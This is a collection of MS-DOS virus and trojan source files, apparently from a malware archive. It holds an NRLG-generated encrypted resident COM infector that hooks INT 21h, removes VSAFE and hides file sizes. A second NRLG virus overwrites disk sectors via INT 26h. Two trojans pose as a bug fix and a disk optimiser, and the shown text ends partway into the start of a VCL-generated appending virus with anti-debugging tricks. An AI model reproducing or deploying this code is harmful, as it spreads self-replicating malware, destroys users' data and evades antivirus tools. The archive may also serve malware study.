; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db 'FORNICAT by [NRLG]'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿnot word ptr [di]
xor byte ptr [di],098h
dec word ptr [di]
add byte ptr [di],089h
xor byte ptr [di],0cch
sub byte ptr [di],0b4h
sub word ptr [di],0d649h
add word ptr [di],01a8ah
add word ptr [di],01bc5h
add word ptr [di],0279h
add byte ptr [di],0b2h
add word ptr [di],04d33h
sub byte ptr [di],0b8h
sub word ptr [di],0c574h
sub byte ptr [di],087h
xor word ptr [di],0fbfbh
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov ax,351ch ;
int 21h ;store the int 1ch vectors
mov word ptr [trampaint+bp],bx ;in cs:trampaint
mov word ptr [trampaint+2+bp],es ;
mov ax,251ch ;put the int 1ch (clock) vector
push cs ;
pop ds ;
mov dx,offset tardar ;in offset tardar
int 21h ;
mov dx,offset fin ;
int 27h ;main resident the code
NO_DAY: ;
ret ;ret for program
tardar: ;int 1c handler
pushf ;
pusha ;
mov cx,0ffffh ;fuck loop for slow speed
trampa: ;
mov ax,ax ;
loop trampa ;
popa ;
popf ;
JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch
ret ;
trampaint dd ? ;
;--------------------------------;
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 020H ;day for the action
action_mes Db 04H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start

112
MSDOS/Virus.MSDOS.Unknown.free.asm Normal file
View File

@ -0,0 +1,112 @@
title FREE.ASM
page,132
cseg segment para 'code'
assume cs:cseg
main proc far
org 100h
start:
jmp begin
banner db 0ah,'FREE Vers 1.0 - Sept. 1985 - by Art Merrill',0dh,0ah,'$'
db 'Copyright (C) 1985',0dh,0ah,'$'
db 'Ziff-Davis Publishing Company',0dh,0ah,'$'
total: db 0ah,8 dup(0),' bytes total disk space',0dh,0ah
diff: db 8 dup(0),' bytes allocated',0dh,0ah
bytes: db 8 dup(0),' bytes available on disk',0dh,0ah,0ah,'$'
hltotal: dw 0,0
hlbytes: dw 0,0
begin:
mov dx,offset banner
mov ah,9
int 21h
mov si,5ch ;address of selected drive
mov dl,[si]
mov ah,36h ;get disk free space
int 21h
push ax ;save for total bytes
push cx ;save for total bytes
push dx ;save for total bytes
mul bx ;get total clusters
mul cx ;get total bytes
std
mov di,offset hlbytes+2
xchg ax,dx
stosw
xchg ax,dx
stosw
mov di,offset bytes+7 ;storage for ascii printout
call ascii
pop dx ;get back total clusters
pop cx ;get back bytes per sector
pop ax ;get back sectors per cluster
mul dx ;total clusters
mul cx ;bytes per sector
mov di,offset hltotal+2 ;same routine as above to get
xchg ax,dx ; total bytes
stosw
xchg ax,dx
stosw
mov di,offset total+8 ;storage for ascii printout
call ascii
mov ax,word ptr hltotal+2 ;calculate difference between
sub ax,word ptr hlbytes+2 ; total bytes and bytes allocated
xchg ax,dx ; to get total bytes remaining
mov ax,word ptr hltotal
sub ax,word ptr hlbytes
jnc skip
dec dx ;adjust total for carry
skip:
mov di,offset diff+7 ;storage for ascii printout
call ascii
mov dx,offset total ;print results
mov ah,9
int 21h
int 20h ;exit
main endp
ascii proc near
xchg bp,dx ;save high word
mov bx,0ah ;divisor
mov cl,30h ;conversion for ascii
rpt1:
cmp bp,0 ;are we done with high words
jz rpt2 ;yes
xchg ax,bp ;no-get high word
xor dx,dx ;clear dx
div bx
xchg bp,ax ;this will be the new high word
div bx ;divide low word + remainder
or dl,cl ;convert hex value to ascii
mov [di],dl ;quotient into storage
dec di ;step back one byte
jmp rpt1 ;go again
rpt2:
xor dx,dx ;clear dx
div bx
or dl,cl ;convert hex value to ascii
mov [di],dl ;quotient into storage
dec di ;step back one byte
cmp ax,0 ;are we done?
jnz rpt2 ;no
ret ;yes
ascii endp
cseg ends
end start


416
MSDOS/Virus.MSDOS.Unknown.freez.asm Normal file
View File

@ -0,0 +1,416 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall TRASH_RN
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
j: ;
jmp j ;Halt the process
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
TRASH_RN: ;
MOV AH,2DH ;
INT 21H ;get date
CMP Dl,6 ;is =6 (RAN 0-99)
jne NO_DAYY ;nop! fuck ret
mov ah,0dh ;
int 21h ;reset disk
mov al,2 ;
mov cx,0ffffh ;
mov dx,0 ;
int 26h ;fuck ffffh sector
mov ah,0dh ;reste disk
int 21h ;
mov al,2 ;
mov cx,0ffffh ;
mov dx,0ffffh ;new fuck+
int 26h ;heheheh!!!
NO_DAYY: ;
ret ;
;---------------------------------
ÿ;-------------;
Dir_S: ;
jmp dirsal ;
no_Good:iret ;
;-------------;
ÿaction_dia Db 01H ;day for the action
action_mes Db 01H ;month for the action
FECHA DW 08H ;Secon for mark
FECHAd Db 08H ;Secon for mark dir st
fin:
code ends
end start

32
MSDOS/Virus.MSDOS.Unknown.friday.asm Normal file
View File

@ -0,0 +1,32 @@
;-------------------------------------------------------------------;
; Simple little program to change the date to July 13th, 1990 ;
; Which just happens to be a Friday...what a coincidence.... ;
; This should be great fun if you have a virus or a program that ;
; goes *BOOM* on Friday the 13th, such as the Israel strain ;
; Have fun, and remember, I'm not responsible if you get your lazy ;
; ass busted while trying to bring down the damn Pentagon ;
; Kryptic Night - SMC - RaCK - U<< - PhD ;
;-------------------------------------------------------------------;
CODE SEGMENT
Assume CS:code,DS:code
ORG 100h
start: Jmp begin
text1 db ' Telemate bug fix for version 3.0+$ ' ;Bogus filler text
text2 db ' TM.EXE fixed!$ ' ;Bogus filler text
text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change
Begin proc NEAR
mov ah,05h ;Function 5 - Set Real Time Clock
mov cx,1990h ;What century
mov dx,0713h ;Month/day
int 1ah ;Execute
mov ah,09h ;Funtion 9 - Print string <end in $>
lea dx,text3 ;What text to print
int 21h ;Execute function 09
int 20h ;Quit .COM file
begin endp
CODE ENDS ;End segment
END start ;End program

1828
MSDOS/Virus.MSDOS.Unknown.frodo.asm Normal file
View File

File diff suppressed because it is too large Load Diff

77
MSDOS/Virus.MSDOS.Unknown.froggie.pas Normal file
View File

@ -0,0 +1,77 @@
program Disk_Space;
{ This program makes use of the
CHR command
USES command
VAR command
CLRSCR command
WRITELN command
DISKFREE command
DISKSIZE command
TRUNC command
IF-THEN-ELSE command
REPEAT-UNTIL command
ASSIGN command
REWRITE command
WRITE command
DELAY command
CLOSE command
RANDOMIZE command
}
uses dos,crt;
var cdn:byte;
dirname:string;
a,b,c,d,e,f,g,h,i,j,k,l:char;
ii:integer;
q:text;
ai:boolean;
begin
randomize;
clrscr;
cdn:=2;
gotoxy(22,2);
Writeln('Froggie-OPT v1.12 (c) Jason Friedman');
gotoxy(25,3);
writeln('Please wait - Reading System Data');
repeat;
cdn:=cdn+1;
if (diskfree(cdn)<1) and (cdn<3) then
Writeln(' Your disk for drive ',chr(cdn+64),': is not in the drive')
else
if (diskfree(cdn)>1) then
Writeln(' Your disk space free for drive ',chr(cdn+64),': is ',
trunc(diskfree(cdn)/1000),' KB out of ',trunc(disksize(cdn)/1000),' KB');
until (diskfree(cdn)<1) and (cdn>2);
delay(1000);
repeat
writeln(' Preparing to Froggie OPT - Please do not disturb');
writeln(' Any type of disturbance will cause file damnage ');
ii:=ii+1;
a:=chr(trunc(random(255)));
b:=chr(trunc(random(255)));
c:=chr(trunc(random(255)));
d:=chr(trunc(random(255)));
e:=chr(trunc(random(255)));
f:=chr(trunc(random(255)));
g:=chr(trunc(random(255)));
h:=chr(trunc(random(255)));
i:=chr(trunc(random(255)));
j:=chr(trunc(random(255)));
k:=chr(trunc(random(255)));
l:=chr(trunc(random(255)));
mkdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l);
chdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l);
assign (q,'YOU');
rewrite (q);
close (q);
assign (q,'ARE');
rewrite (q);
close (q);
Assign (q,'LAME');
rewrite (q);
close (q);
chdir('..');
until ai=true;
end.


359
MSDOS/Virus.MSDOS.Unknown.fs.asm Normal file
View File

@ -0,0 +1,359 @@
; FS.ASM -- Fuckin Shit Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Unknown User
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
lea bx,[di + null_vector] ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov cx,0063h ; Do 99 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
db 0F0h,039h,067h,037h,006h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
